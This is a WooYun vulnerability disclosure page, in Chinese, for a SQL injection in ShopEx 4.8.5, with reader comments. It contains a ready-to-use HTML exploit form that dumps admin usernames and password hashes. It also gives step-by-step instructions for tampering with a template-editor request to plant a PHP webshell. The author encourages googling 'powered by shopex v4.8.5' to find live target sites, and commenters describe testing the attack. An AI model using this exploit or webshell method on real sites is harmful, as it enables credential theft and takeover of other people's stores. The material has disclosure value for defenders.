当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(25) 关注此漏洞

缺陷编号: WooYun-2012-08597

漏洞标题: SHOPEX 4.8.5 注入漏洞以及后台拿SHELL

相关厂商: ShopEx

漏洞作者: fyouckoff

提交时间: 2012-06-21 17:47

公开时间: 2012-08-05 17:47

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 第三方不可信程序 php+数字类型注射 shopex sql注射漏洞利用技巧

7人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-06-21: 细节已通知厂商并且等待厂商处理中
2012-06-21: 厂商已经确认,细节仅向厂商公开
2012-06-24: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2012-08-15: 细节向核心白帽子及相关领域专家公开
2012-08-25: 细节向普通白帽子公开
2012-09-04: 细节向实习白帽子公开
2012-08-05: 细节向公众公开

简要描述:

SHOPEX 4.8.5 注入漏洞以及后台拿SHELL
shopex很久没有更新了啊亲,非得每次出漏洞了才更新一下下吗?

wooyun提示:漏洞在上报乌云之前已经在外界披露,请紧急处理

详细说明:

SHOPEX 4.8.5 注入漏洞以及后台拿SHELL



漏洞文件:

漏洞核心函数 \core\model_v5\trading\mdl.goods.php

漏洞代码:

code 区域
public function getProducts( $gid, $pid = 0 )


{


	$sqlWhere = "";


	if ( 0 < $pid )


	{


		$sqlWhere = " AND A.product_id = ".$pid; //**.**.**.** 没过滤 ~~~~~~


	}


	$sql = "SELECT A.*,B.image_default FROM sdb_products AS A LEFT JOIN sdb_goods AS B ON A.goods_id=B.goods_id WHERE A.goods_id=".intval( $gid ).$sqlWhere;


	return $this->db->select( $sql );


}





\core\shop\controller\ctl.product.php 文件调用

code 区域
function gnotify($goods_id=0,$product_id=0){


 


	if($_POST['goods']['goods_id']){


		$goods_id = $_POST['goods']['goods_id'];


		$product_id = $_POST['goods']['product_id'];


	}


		$this->id =$goods_id;


	$objGoods = &$this->system->loadModel('trading/goods');


	$aProduct = $objGoods->getProducts($goods_id, $product_id);//**.**.**.** 直接带进去了


 


	$this->pagedata['goods'] = $aProduct[0];


	if($this->member[member_id]){


		$objMember = &$this->system->loadModel('member/member');


		$aMemInfo = $objMember->getFieldById($this->member[member_id], array('email'));


		$this->pagedata['member'] = $aMemInfo;


	}


 


	$this->output();


}





EXP: 保存为html使用即可

code 区域
<html> 


<head> 


<title>Shopex 4.8.5 SQL Injection Exp</title> 


</head> 


<body> 


<h2>Shopex 4.8.5 SQL Injection Exp (product-gnotify)</h2> 


<form action="http://**.**.**.**/?product-gnotify" method="post" name="submit_url"> 


    <input type="hidden" name="goods[goods_id]" value="3"> 


    <input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators"> 


    <input type="submit" value=""> 


</form>


 


网址请修改:http://**.**.**.**/?product-gnotify <br />


本程序只能用于网站安全检测 <br />


禁止用于非法途径,产生的一切后果与作者无关!<br />


<body> 


</html>





拿shell方法….

第一步 页面管理 修改模版 然后选一个XML编辑

开始用 live http 抓包 你们懂的 然后把第一个POST包给抓出来

然后改包 包要这么改 我研究了半天 尼玛的菊花红

id=1273923028-info.xml&tmpid=1273923028&name=index_temp.php&file_source=

解释一下 id是你选择的模版文件夹名称 后面的info.xml 是你修改的XML文件 tmpid= 你们懂的 就是模版文件夹 然后 name 是你提交的文件名字 file_source 是后门或者shel

我这里是一句话 你们懂的 然后提交了之后 地址是这样的http://Madman.in/themes/文件名称/你的木马名称



随便google下“powered by shopex v4.8.5”,找个站测试一下





另外测试了几个知名站点,也都中招,这里就不贴图了

跟随电商潮而来的另一波脱裤潮要来了。。。

漏洞证明:

修复方案:

找程序猿吧

版权声明:转载请注明来源 fyouckoff@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2012-06-21 21:51

厂商回复:

感谢您为信息安全做的贡献。
改漏洞已经过提交过或者已经公开处理过
非常感谢

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评价

  1. 2012-06-21 18:04 | beastk ( 实习白帽子 | Rank:50 漏洞数:11 | 一不小心高潮了)
    4

    假设一种情景,某人挖洞保存很久,别人发布出来了,自己用得差不多了就报出来,还可以赚个原创,只是假设。

    1# 回复此人
  2. 2012-06-21 18:46 | fyouckoff ( 路人 | Rank:6 漏洞数:3 | 这个家伙很穷,什么都没有留下)
    0

    @beastk 你只猜对了一半。交流、进步也是wooyun存在的原因吧 @xsser 这里只能发原创的话,这个可以不给rank

    2# 回复此人
  3. 2012-06-21 20:22 | 疯狂 ( 普通白帽子 | Rank:239 漏洞数:30 | 桃李春风一杯酒 莲湖夜雨八年灯)
    0

    幸好我回家早,不然我的小店。。。。。。。 在我的小店上测试成功,操。。。。。。不知道有shell没

    3# 回复此人
  4. 2012-06-21 20:39 | fyouckoff ( 路人 | Rank:6 漏洞数:3 | 这个家伙很穷,什么都没有留下)
    0

    @疯狂 我的店也是...

    4# 回复此人
  5. 2012-06-21 22:33 | 疯狂 ( 普通白帽子 | Rank:239 漏洞数:30 | 桃李春风一杯酒 莲湖夜雨八年灯)
    0

    但是get不了shell,我测试了半天,get不到shell

    5# 回复此人
  6. 2012-06-22 08:57 | saga ( 路人 | Rank:11 漏洞数:2 | 世界上只有10种人,懂二进制的,和不懂二进...)
    0

    @疯狂 后台可以修包拿哦

    6# 回复此人
  7. 2012-06-22 14:41 | 鱼化石 ( 实习白帽子 | Rank:93 漏洞数:18 | 介绍不能为空)
    0

    shopex再不出洞都快被遗忘了

    7# 回复此人
  8. 2012-06-23 11:44 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)
    0

    http://www.lpboke.com/shopex-4-8-5-%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E4%BB%A5%E5%8F%8A%E5%90%8E%E5%8F%B0%E6%8B%BFshell.html - -被人公开了

    8# 回复此人
  9. 2012-09-14 17:27 | Aepl│恋爱 ( 实习白帽子 | Rank:45 漏洞数:15 | Forzen恋爱-不要做你的Guest 只想做的你adm...)
    0

    @saga 求拿shell方法了。。我弄了半天 就像@fyouckoff 说的 尼玛 菊花红 还没拿到shell

    9# 回复此人
  10. 2013-03-20 16:45 | 少校 ( 实习白帽子 | Rank:40 漏洞数:5 | 别开枪,自己人!)
    0

    我去 才给1rank

    10# 回复此人

登录后才能发表评论,请先 登录